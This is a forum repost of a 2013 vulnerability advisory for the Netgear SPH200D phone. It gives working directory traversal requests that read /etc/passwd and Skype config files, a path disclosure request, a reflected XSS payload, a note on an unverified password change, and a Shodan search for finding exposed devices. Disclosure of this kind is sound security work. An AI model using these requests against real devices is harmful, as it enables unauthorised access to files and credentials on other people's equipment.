Praetorian503 Posted February 1, 2013 Report Share Posted February 1, 2013 Netgear SPH200D suffers from cross site scripting, path disclosure, and directory traversal vulnerabilities.Device Name: SPH200DVendor: Netgear============ Vulnerable Firmware Releases: ============Firmware Version : 1.0.4.80Kernel Version : 4.1-18Web Server Version : 1.5============ Device Description: ============http://support.netgear.com/product/SPH200D============ Shodan Torks ============Shodan Search: SPH200D=> Results 337 devices============ Vulnerability Overview: ============* directory traversal:Access local files of the device. You need to be authenticated or you have to find other methods for accessing the device.Request:http://192.168.178.103/../../etc/passwdResponse:HTTP/1.0 200 OKContent-type: text/plainExpires: Sat, 24 May 1980.7:00:00.GMTPragma: no-cacheServer: simple httpd 1.0root:x:0:0:root:/root:/bin/bashdemo:x:5000:100:Demo User:/home/demo:/bin/bashnobody:x:65534:65534:Nobody:/htdocs:/bin/bashIf you request a directory you will get a very nice directory listing for browsing through the filesystem:/../../var/HTTP/1.0 200 OKContent-type: text/htmlExpires: Sat, 24 May 1980.7:00:00.GMTPragma: no-cacheServer: simple httpd 1.0<H1>Index of ../../var/</H1><p><a href="/../../var/.">.</a></p><p><a href="/../../var/..">..</a></p><p><a href="/../../var/.Skype">.Skype</a></p><p><a href="/../../var/jffs2">jffs2</a></p><p><a href="/../../var/htdocs">htdocs</a></p><p><a href="/../../var/cnxt">cnxt</a></p><p><a href="/../../var/ppp">ppp</a></p><p><a href="/../../var/conf">conf</a></p><p><a href="/../../var/bin">bin</a></p><p><a href="/../../var/usr">usr</a></p><p><a href="/../../var/tmp">tmp</a></p>So with this information you are able to access the skype configuration with the following request:/../../var/.Skype/<user>/config.xmlScreenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/LFI-01.preview.png* For changing the current password there is no request to the current passwordWith this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser.* local path disclosure:Request:http://192.168.178.103/%3C/Response:The requested URL '/var/htdocs/%3C/' was not found on this server.Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/local-path-disclosure.png* reflected Cross Site ScriptingAppending scripts to the URL reveals that this is not properly validated for malicious input.http://192.168.178.102/network-dhcp.html4f951<script>alert(1)</script>e51c012502fScreenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/XSSed-IE6.png============ Solution ============No known solution available.============ Credits ============The vulnerability was discovered by Michael MessnerMail: devnull#at#s3cur1ty#dot#deWeb: http://www.s3cur1ty.deAdvisory URL: http://www.s3cur1ty.de/m1adv2013-002Twitter: @s3cur1ty_de============ Time Line: ============August 2012 - discovered vulnerability07.08.2012 - reported vulnerability to Netgear08.08.2012 - case closed by Netgear29.01.2013 - public release===================== Advisory end =====================Source: PacketStorm Quote Link to comment Share on other sites More sharing options...